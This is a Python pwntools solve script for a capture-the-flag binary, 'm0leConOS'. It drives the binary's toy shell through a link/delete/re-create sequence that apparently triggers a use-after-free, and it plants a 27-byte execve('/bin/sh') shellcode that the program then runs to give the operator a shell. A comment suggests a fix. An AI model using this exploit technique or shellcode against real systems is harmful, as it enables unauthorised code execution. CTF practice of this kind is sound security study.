solve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
import re
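# Solve script for the challenge binary launched below (./dist/m0leConOS).
# It drives the program's shell-style prompt through a fixed command sequence
# and then hands the session over to the operator.

# Prompt the target prints before it accepts a top-level command.
prompt = b"# "

# 27-byte x86-64 Linux payload: it rebuilds the string "/bin/sh" by negating
# a 64-bit immediate (so the raw bytes hold neither the path nor a NUL) and
# then issues syscall 0x3b (execve).  Below it is written as the content of a
# file inside the target.
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

# pwntools sets args.LOCAL when LOCAL is given on the command line; without
# it the script talks to a service on localhost:6745.
if args.LOCAL:
    conn = process("./dist/m0leConOS")
else:
    conn = remote("localhost", 6745)

# Step 1: create a file "tmp" with throwaway content.
conn.sendlineafter(prompt, b"touch")
conn.sendlineafter(b"name: ", b"tmp")
conn.sendlineafter(b"> ", b"junk1")

# Step 2: create a link from "m0lecat" to the new name "tmp2".
conn.sendlineafter(prompt, b"ln")
conn.sendlineafter(b"from: ", b"m0lecat")
conn.sendlineafter(b"to: ", b"tmp2")

# Step 3: remove both names.
# NOTE(review): the link / delete / re-create ordering suggests the target
# keeps a stale reference to storage released by `rm`, and that `m0lecat`
# later treats the reused storage as code.  That is inferred from this
# sequence only; confirm against the challenge source.  If so, the fix
# belongs in the target: invalidate or reference-count link targets on
# removal and keep file contents in non-executable memory.
conn.sendlineafter(prompt, b"rm")
conn.sendlineafter(b"name: ", b"tmp")
conn.sendlineafter(prompt, b"rm")
conn.sendlineafter(b"name: ", b"tmp2")

# Step 4: re-create "tmp", this time with the payload as its content.
conn.sendlineafter(prompt, b"touch")
conn.sendlineafter(b"name: ", b"tmp")
conn.sendlineafter(b"> ", shellcode)

# Step 5: run "m0lecat" and give it "tmp" once its own "> " prompt appears.
conn.sendlineafter(prompt, b"m0lecat")
conn.recvuntil(b"\n> ")
conn.sendline(b"tmp")

# Hand stdin/stdout to the operator.
conn.interactive()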